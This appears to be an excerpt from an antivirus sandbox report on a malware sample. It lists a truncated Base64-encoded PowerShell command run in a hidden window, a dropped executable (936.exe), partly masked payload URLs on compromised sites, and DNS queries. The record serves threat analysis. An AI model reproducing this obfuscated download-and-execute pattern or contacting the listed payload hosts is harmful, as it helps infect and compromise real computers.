Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAHcAZQBjAHYAdgBxAGIAYQA9ACcASwB4AG0AaABpAGMAZwBnACcAOwAkAFcAawBrAGMAcgBsAGEAYwB4AGUAdABsAGwAIAA9ACAAJwA5ADMANgAnADsAJABIAGQAeAB3AGwAbgBxAGoAZwB2AHEAbAA9ACcARAB0AGUAYwBmAGoAawBuAHEAYgA...
- %HOMEPATH%\936.exe
- %HOMEPATH%\936.exe
- %HOMEPATH%\936.exe
- http://to#####.#ommunitymonitoring.org/test/W15jPuDBv/
- http://mv###nte.com.br/wp-content/xypn/
- http://do####ria-lb.com/wp-admin/par/
- DNS ASK me####anandco.net
- DNS ASK to#####.#ommunitymonitoring.org
- DNS ASK rc#####seofworship.org
- DNS ASK mv###nte.com.br
- DNS ASK do####ria-lb.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAHcAZQBjAHYAdgBxAGIAYQA9ACcASwB4AG0AaABpAGMAZwBnACcAOwAkAFcAawBrAGMAcgBsAGEAYwB4AGUAdABsAGwAIAA9ACAAJwA5ADMANgAnADsAJABIAGQAeAB3AGwAbgBxAGoAZwB2AHEAbAA9ACcARAB0AGUAYwBmAGoAawBuAHEAYgA...' (with hidden window)